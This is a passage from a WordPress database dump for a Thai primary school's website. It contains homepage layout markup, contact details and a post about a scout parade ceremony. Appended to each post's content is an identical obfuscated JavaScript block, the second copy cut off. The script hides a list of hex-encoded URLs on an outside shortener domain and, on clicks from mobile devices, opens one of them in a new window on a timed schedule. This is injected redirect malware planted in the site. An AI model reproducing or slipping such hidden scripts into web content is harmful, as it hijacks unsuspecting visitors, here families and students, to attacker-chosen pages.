{\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-30 11:06:08','2024-07-30 04:06:08','',14,'http://pakhaeng.ssk.in.th/?p=274',0,'revision','',0),
(275,1,'2024-07-30 11:10:03','2024-07-30 04:10:03','<!-- wp:paragraph -->\n<p>วันที่ 1 กรกฎาคม พ.ศ.2567 นางเสน่หา พลโสภา ผู้อำนวยการโรงเรียนบ้านหนองปลาเข็ง กอไหล่ เป็นประธานในพิธีทบทวนคำปฏิญาณและสวนสนามลูกเสือ เนื่องในวันคล้ายวันสถาปนาคณะลูกเสือแห่งชาติประจำปี 2567 ณ สนามโรงเรียนบ้านหนองปลาเข็ง กอไหล่ โดยมีผู้บังคับบัญชาลูกเสือ เข้าร่วมทำพิธีเพื่อน้อมรำลึกในพระมหากรุณาธิคุณในพระบาทสมเด็จพระมงกุฏเกล้าเจ้าอยู่หัว ผู้พระราชทานกำเนิดลูกเสือไทย และแสดงความจงรักภักดีแด่พระประมุขคณะลูกเสือแห่งชาติ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:video {\"id\":278} -->\n<figure class=\"wp-block-video\"><video autoplay controls src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สวนสนาม.mp4\"></video></figure>\n<!-- /wp:video -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 